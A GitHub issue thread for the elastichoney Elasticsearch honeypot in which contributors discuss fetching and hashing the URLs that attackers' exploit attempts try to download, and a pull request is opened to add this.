elastichoney icon indicating copy to clipboard operation
elastichoney copied to clipboard
verified publisher icon jordan-wright

Explicitly fetch http payloads for analysis

Open jatrost opened this issue 10 years ago • 5 comments

Many of the exploit attempts cause ES to attempt to wget a URL. This URL should be fetched, md5'ed, and ideally included in the payload for analysis. Maybe this should be configurable.

jatrost avatar Apr 27 '15 20:04 jatrost

I've thought about this exact thing. Kippo does this quite well. My only concern would be how to parse the wget command sent to the honeypot.

jordan-wright avatar Apr 29 '15 01:04 jordan-wright

This is how we do it for shockpot: https://github.com/threatstream/shockpot/blob/master/commands.py. We just grabbed a bunch of example exploit attempts and made sure that we covered most of them. The bad guys will be able to evade but I haven't seen many examples of this in the wild.

jatrost avatar Apr 30 '15 10:04 jatrost

Opened a PR to address this enhancement https://github.com/jordan-wright/elastichoney/pull/6

cloughrm avatar May 07 '15 22:05 cloughrm

Thanks for this everyone! Let me review the PR and I'll see what I can do to merge. My biggest holdup is reviewing exactly what's going on with the parsing to make sure there isn't a way to exploit the honeypot.

Give me a week or so and bug me if I haven't merged by then :smile:

Thanks again!

jordan-wright avatar May 08 '15 03:05 jordan-wright

Thanks @jordan-wright - I have one more commit coming shortly to address handling form-encoded vs json encoded post requests.

cloughrm avatar May 08 '15 15:05 cloughrm